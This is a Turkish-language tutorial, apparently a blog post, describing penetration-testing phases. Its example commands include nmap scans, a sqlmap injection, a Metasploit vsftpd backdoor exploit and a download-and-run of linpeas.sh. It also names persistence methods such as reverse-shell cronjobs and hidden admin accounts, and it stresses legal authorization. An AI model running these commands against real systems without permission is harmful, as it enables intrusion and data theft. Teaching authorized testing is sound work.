Modern siber tehditlere karşı koymak için yalnızca duvar örmek yeterli değil, o duvarların nereden aşılabileceğini de görmeniz gerekir. İşte bu noktada sızma testleri (pentest) devreye giriyor. Bu yazıda, bir pentest sürecinin tüm adımlarını örnek komutlar, araçlar ve teknik detaylarla birlikte açıklıyorum.

📌 İçindekiler

  1. Pentest Nedir?
  2. Pentest Türleri
  3. Pentest Süreci — Adım Adım
  4. Kullanılan Araçlar ve Komutlar
  5. Örnek Senaryo: Gerçekçi Bir Pentest Uygulaması
  6. Etik, Hukuk ve Sınırlar
  7. Raporlama Süreci
  8. Kendi Pentest Ortamını Kur
  9. Sonuç ve Öneriler

1. 🔍 Pentest Nedir?

Pentest (Penetration Testing), sistemlerin güvenliğini test etmek için yapılan simüle edilmiş, kontrollü siber saldırılardır. Amaç, bir saldırganın yapabileceği şeyi siz yapmadan önce görüp önlem almaktır.

Pentest, yalnızca zafiyet taraması değil, o zafiyetin nasıl sömürülebileceğini (exploitation) de içerir.

2. 🧱 Pentest Türleri

Black Box: Hiçbir bilgi verilmez. Gerçek bir saldırgan gibi yaklaşılır.

White Box: Tüm sistem iç yapısı, kaynak kod, erişim gibi bilgiler testçiye verilir.

Gray Box: Sınırlı bilgi verilir. Kullanıcı seviyesinde birinin saldırı senaryosu simüle edilir.

3. 🧭 Pentest Süreci — 6 Aşamalı Model

1. Bilgi Toplama (Reconnaissance)

Amaç: Hedef sistemle ilgili açık kaynaklı veya doğrudan elde edilebilir tüm bilgileri toplamak.

🔧 Araçlar ve Komutlar:

  • whois, nslookup, dig
  • theHarvester: E-posta, alt domain, çalışan bilgileri.
  • Shodan: Açık portlar ve cihazlar.

📌 Örnek:

theHarvester -d hedeffirma.com -b google

2. Aktif Bilgi Toplama (Scanning / Enumeration)

Amaç: Hedef sistemde çalışan servisleri, portları ve varsa kullanıcı isimlerini bulmak.

🔧 Araçlar:

  • Nmap: Port, versiyon ve OS taraması
  • Enum4linux: Samba paylaşım ve kullanıcı bilgileri
  • Nikto: Web sunucusu zafiyetleri

📌 Örnek:

nmap -sC -sV -T4 192.168.1.1

3. Zafiyet Analizi (Vulnerability Analysis)

Amaç: Bulunan servislerde bilinen açıkları tespit etmek.

🔧 Araçlar:

  • Nessus (GUI tabanlı)
  • OpenVAS (açık kaynak)
  • searchsploit (Exploit DB ile lokal arama)
  • wpscan, joomscan, nikto

📌 Örnek:

searchsploit vsftpd 2.3.4

4. Sömürü (Exploitation)

Amaç: Tespit edilen zafiyetler kullanılarak sisteme sızmak.

🔧 Araçlar:

  • Metasploit Framework
  • sqlmap (veritabanı saldırısı)
  • Hydra (Brute-force)
  • Burp Suite (Web uygulaması istismarı)

📌 Örnek SQL Injection:

sqlmap -u "http://site.com/product?id=5" --dbs

📌 Metasploit ile exploit:

msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST 192.168.1.1
run

5. Hak Yükseltme (Privilege Escalation)

Amaç: Sistemde düşük yetkili kullanıcıdan root/admin yetkilerine geçmek.

🔧 Araçlar:

  • LinPEAS, WinPEAS
  • sudo -l, getcap -r / 2>/dev/null
  • GTFOBins, LOLBAS

📌 Örnek:

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh && ./linpeas.sh

6. Kalıcılık & İz Silme (Optional — Kontrollü yapılmalı)

Amaç: Sisteme yeniden erişim yolları oluşturmak veya yapılan işlemleri gizlemek.

Örnek Kalıcılık Yöntemleri:

  • Reverse shell içeren cronjob
  • SSH authorized_keys içine ekleme
  • Yeni admin kullanıcı oluşturma (gizli)

❗ Bu adım genellikle sadece izinli ve kontrollü ortamlarda yapılır.

4. 🧪 Örnek Senaryo: Web Uygulaması Pentest'i

Hedef: http://testsite.com

  1. Recon: nslookup, whatweb, dirb ile endpoint keşfi
  2. Açıklar: SQLi ve XSS tespit edildi
  3. Exploitation: sqlmap ile admin bilgileri dump edildi
  4. Oturum ele geçirildi, admin panel erişildi
  5. Burp Suite ile CSRF zafiyeti bulundu
  6. Raporlama: CVSS skoru ile zafiyetler sınıflandırıldı

5. ⚖️ Etik ve Hukuki Çerçeve

  • İzinsiz pentest YASAL DEĞİLDİR.
  • Mutlaka yazılı izin alınmalı
  • KVKK, GDPR gibi regülasyonlara dikkat edilmeli
  • Aksi halde 5237 sayılı TCK 243–244. maddelerine göre suç sayılır

6. 📑 Pentest Raporu Nasıl Hazırlanır?

Rapor İçeriği:

  • Amaç ve kapsam
  • Yöntemler (OWASP, PTES, NIST gibi çerçeveler)
  • Tespit edilen açıklar
  • Risk seviyesi (CVSS ile)
  • Teknik detaylar + önerilen çözümler

7. 🧰 Kendi Pentest Ortamını Kur (Evde Pratik için)

Kali Linux: Hazır araçlarla dolu distro

Metasploitable 2: Zafiyetli sistem

TryHackMe: Web tabanlı pratik platform

Hack The Box: Gerçekçi CTF'ler

8. 🎯 Sonuç

Pentest; bilgi toplama, analiz, saldırı ve raporlama gibi birbirine bağlı süreçlerden oluşan ciddi bir test disiplini. Başarılı bir pentestçi, yalnızca araçları kullanmakla kalmaz, aynı zamanda saldırgan gibi düşünür.

📥 Kaynaklar

  • OWASP Web Security Testing Guide
  • Pentest Standard — PTES
  • TryHackMe Pentesting Path